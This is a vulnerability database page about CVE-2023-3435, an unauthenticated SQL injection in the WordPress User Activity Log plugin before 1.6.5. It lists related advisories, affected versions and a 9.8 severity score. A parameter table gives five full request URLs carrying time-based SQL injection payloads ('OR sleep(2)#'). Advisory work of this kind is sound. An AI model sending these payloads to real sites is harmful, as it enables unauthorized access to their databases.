Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2023-3435 | 15 Aug 202300:20 | – | circl |
 | WordPress plugin User Activity Log SQL Injection Vulnerability | 14 Aug 202300:00 | – | cnnvd |
 | CVE-2023-3435 User Activity Log < 1.6.5 - Unauthenticated SQLi | 14 Aug 202319:10 | – | cvelist |
 | EUVD-2023-44099 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-3435 | 14 Aug 202320:15 | – | nvd |
 | CVE-2023-3435 | 14 Aug 202320:15 | – | osv |
 | WordPress User Activity Log Plugin < 1.6.5 is vulnerable to SQL Injection | 27 Jul 202300:00 | – | patchstack |
 | Sql injection | 14 Aug 202320:15 | – | prion |
 | CVE-2023-3435 | 23 May 202503:55 | – | redhatcve |
 | CVE-2023-3435 User Activity Log < 1.6.5 - Unauthenticated SQLi | 14 Aug 202319:10 | – | vulnrichment |
10
Node
[
{
"vendor": "Unknown",
"product": "User Activity Log",
"versions": [
{
"status": "affected",
"versionType": "custom",
"version": "0",
"lessThan": "1.6.5"
}
],
"defaultStatus": "unaffected",
"collectionURL": "https://wordpress.org/plugins"
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| userrole | query param | /wp-admin/admin-post.php?export=user_logs&export-nonce=abc&userrole=abc%22+OR+sleep(2)%23+ | SQL injection through userrole parameter in export feature. | CWE-89 |
| username | query param | /wp-admin/admin-post.php?export=user_logs&export-nonce=abc&username=abc%27+OR+sleep(2)%23+ | SQL injection through username parameter in export feature. | CWE-89 |
| type | query param | /wp-admin/admin-post.php?export=user_logs&export-nonce=abc&type=abc%27+OR+sleep(2)%23+ | SQL injection through type parameter in export feature. | CWE-89 |
| txtsearch | query param | /wp-admin/admin-post.php?export=user_logs&export-nonce=abc&txtsearch=abc%27+OR+sleep(2)%23+ | SQL injection through txtsearch parameter in export feature. | CWE-89 |
| showip | query param | /wp-admin/admin-post.php?export=user_logs&export-nonce=abc&showip=abc%27+OR+sleep(2)%23+ | SQL injection through showip parameter in export feature. | CWE-89 |
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2026 06:14Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
EPSS0.00808
SSVC